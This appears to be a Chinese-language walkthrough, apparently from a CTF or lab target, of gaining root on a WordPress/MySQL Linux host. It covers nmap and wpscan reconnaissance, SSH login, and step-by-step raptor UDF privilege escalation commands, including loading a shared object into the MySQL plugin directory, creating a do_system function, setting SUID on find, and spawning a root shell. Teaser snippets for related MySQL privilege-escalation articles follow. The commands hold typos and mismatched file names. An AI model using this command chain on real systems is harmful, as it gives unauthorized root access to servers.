namp 掃瞄ip埠
cms 探測 wpscan kali 工具
wpscan 掃瞄出來使用者名稱。用使用者名稱登入ssh
然後利用mysql udf提權。
2.gcc -g -shared -wl,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o -lc
3.登入mysql
4.create table foo(line blob);
5.scp raptor_udf2.so [email protected]:/var/www/html/wordpress/
6.第五步是用來傳遞檔案到目標伺服器上的
7.insertintofoovalues(load_file('/var/www/html/wordpress/raptor_udf5.so'));
8.select * from foo into dumpfile '/usr/lib/mysql/plugin/aaa.so';
9.create function do_system returns integer soname 'aaa.so';
10.select do_system('id > /tmp/out; chown michael.michael /tmp/out');
11.!sh
12.cat /tmp/out
13.載入 select do_system('chmod u+s /usr/bin/find');
14.然後推出mysql 直接用
touch foo
find foo -exec 'whoami' ;
find foo -exec 'id' ;
find foo -exec '/bin/sh' ;
就是root許可權
mysql 提權 通過Mysql提權的幾種姿勢
本文記錄利用mysql資料庫,在拿到shell之後進行提權的兩種方法。一 udf提權 基本步驟 1 匯出udf.dll檔案到指定目錄 有些webshell整合,直接導 出即可,沒有,則需要上傳 2 基於udf.dll建立自定義函式cmdshell 3 利用自定義函式,執行高許可權cmd命令 以下按照...
mysql提權總結
windows管理規範提供了以下三種方法編譯到wmi儲存庫的託管物件格式 mof 檔案 1 執行mof檔案指定為命令列引數講mofcomp.exe檔案。2 使用imofcompiler介面和 compilefile方法。3 拖放到 systemroot system32 wbem mof資料夾的mo...
mysql提權和技巧
1 對apache中介軟體進行降權處理 使用者組為users 2 尋找資料庫的資訊 進行拼接密碼然後解密得到 賬號 root 密碼 root 3 利用sqlmap的udf進行提權操作 因為sqlmap的udf指令碼是經過加密處理的所以還需要sqlmap extra cloak cloak cloak...